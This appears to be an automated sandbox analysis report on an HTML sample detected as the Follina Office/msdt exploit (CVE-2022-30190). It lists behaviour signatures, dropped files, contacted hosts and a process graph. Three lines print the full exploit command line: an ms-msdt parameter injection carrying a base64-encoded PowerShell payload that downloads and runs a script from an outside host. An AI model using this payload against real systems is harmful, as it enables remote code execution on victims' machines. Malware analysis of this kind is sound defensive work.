Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Process created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe "C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe" --appguid={8A69D345-D564-463c-AFF1-A69D9E530F96} --browser-version=85.0.4183.121 --sessionid={f7fe8069-977f-4b29-a967-696bc617f281} --system Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-6299CFF5-1458.pma Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\229f6fa7-84c3-4f31-aa76-91ac60469b60.tmp Jump to behavior
Source: classification engine Classification label: mal56.expl.winHTML@35/121@3/5
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Mutant created: \BaseNamedObjects\Global\G{D19BAF17-7C87-467E-8D63-6C4B1C836373}
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C71209 LoadResource,LockResource,SizeofResource, 27_2_00C71209
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe File created: C:\Program Files\Google\Chrome\ChromeRecovery Jump to behavior
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe Automated click: Next
Source: C:\Windows\System32\msdt.exe File opened: C:\Windows\system32\MSFTEDIT.DLL Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecoveryCRX.crx Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\manifest.json Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\ Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe Directory created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\_metadata\verified_contents.json Jump to behavior
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb` source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Source: Binary string: GoogleUpdateB231574670_unsigned.pdb source: ChromeRecovery.exe, 0000001B.00000000.444673063.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe, 0000001B.00000002.445790129.0000000000C97000.00000002.00000001.01000000.00000007.sdmp, ChromeRecovery.exe.26.dr
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C939A3 push ecx; ret 27_2_00C939B6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FEA6 push ecx; ret 27_2_00C7FEB9
Contains functionality to dynamically determine API calls
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E00C
Drops PE files
Source: C:\Program Files\Google\Chrome\Application\85.0.4183.121\elevation_service.exe File created: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Jump to dropped file
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C73298 GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW,GetPrivateProfileIntW, 27_2_00C73298
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Local\Temp\5208_646319911\LICENSE.txt Jump to behavior
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C802A1 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 27_2_00C802A1
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found evasive API chain (date check)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1341 Jump to behavior
Source: C:\Windows\System32\msdt.exe Window / User API: threadDelayed 1519 Jump to behavior
Found evasive API chain checking for process token information
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C9525D VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect, 27_2_00C9525D
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C898C3 FindFirstFileExW, 27_2_00C898C3
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7F243 IsDebuggerPresent,OutputDebugStringW, 27_2_00C7F243
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C741A3 CreateFileW,GetFileAttributesExW,OutputDebugStringW,CloseHandle,GetLastError,WriteFile, 27_2_00C741A3
Contains functionality to dynamically determine API calls
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E00C
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C713D8 GetProcessHeap, 27_2_00C713D8
Contains functionality to read the PEB
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C83E6C mov ecx, dword ptr fs:[00000030h] 27_2_00C83E6C
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C89665 mov eax, dword ptr fs:[00000030h] 27_2_00C89665
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E00C CloseHandle,InitializeCriticalSection,CreateSemaphoreW,CreateSemaphoreW,CreateSemaphoreW,CreateThread,LoadLibraryW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,InitializeCriticalSection,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E00C
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E2C3 FreeLibrary,FreeLibrary,FreeLibrary,EnterCriticalSection,SetUnhandledExceptionFilter,LeaveCriticalSection,DeleteCriticalSection,ReleaseSemaphore,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,DeleteCriticalSection,CloseHandle,CloseHandle,DeleteCriticalSection, 27_2_00C7E2C3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FE00 SetUnhandledExceptionFilter, 27_2_00C7FE00
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7F886 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 27_2_00C7F886
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C8323D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00C8323D
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E4E6 EnterCriticalSection,SetUnhandledExceptionFilter, 27_2_00C7E4E6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FC6A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 27_2_00C7FC6A
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7E553 SetUnhandledExceptionFilter,LeaveCriticalSection, 27_2_00C7E553
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=cal?c%20IT_LaunchMethod=ContextMenu%20IT_SelectProgram=NotListed%20IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'R2V0LVByb2Nlc3MgLU5hbWUgbXNkdHxTdG9wLVByb2Nlc3M7cG93ZXJzaGVsbCAtbm9wIC1jICJpZXgoTmV3LU9iamVjdCBOZXQuV2ViQ2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cHM6Ly9zZWxsZXItbm90aWZpY2F0aW9uLmxpdmUvWmdmYmUyMzRkZycpIg=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%20IT_AutoTroubleshoot=ts_AUTO%22 Jump to behavior
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C759D6 GetSecurityDescriptorDacl,SetSecurityDescriptorDacl, 27_2_00C759D6
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C78FB3 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 27_2_00C78FB3
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C7FAC3 cpuid 27_2_00C7FAC3
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C73047 GetLocalTime,GetCurrentThreadId,GetCurrentProcessId, 27_2_00C73047
Source: C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir5240_1123535010\ChromeRecovery.exe Code function: 27_2_00C78E0B GetVersionExW,GetProcAddress,FreeLibrary, 27_2_00C78E0B
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 638689 Sample: 1.html Startdate: 03/06/2022 Architecture: WINDOWS Score: 56 22 time.windows.com 2->22 34 Multi AV Scanner detection for submitted file 2->34 36 Yara detected Microsoft Office Exploit Follina CVE-2022-30190 2->36 7 chrome.exe 18 277 2->7         started        10 elevation_service.exe 7 2->10         started        signatures3 process4 dnsIp5 24 192.168.2.1 unknown unknown 7->24 26 239.255.255.250 unknown Reserved 7->26 13 chrome.exe 14 7->13         started        16 msdt.exe 8 7->16         started        20 C:\Program Files\...\ChromeRecovery.exe, PE32 10->20 dropped 18 ChromeRecovery.exe 10->18         started        file6 process7 dnsIp8 28 clients.l.google.com 142.250.184.78, 443, 49734, 58172 GOOGLEUS United States 13->28 30 accounts.google.com 142.251.209.13, 443, 49733 GOOGLEUS United States 13->30 32 2 other IPs or domains 13->32
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.184.78
 clients.l.google.com United States
15169 GOOGLEUS false
142.251.209.13
 accounts.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.1
127.0.0.1

Contacted Domains

Name IP Active
accounts.google.com 142.251.209.13 true
clients.l.google.com 142.250.184.78 true
clients2.google.com unknown unknown
time.windows.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard false
    		high
    https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 false
      		high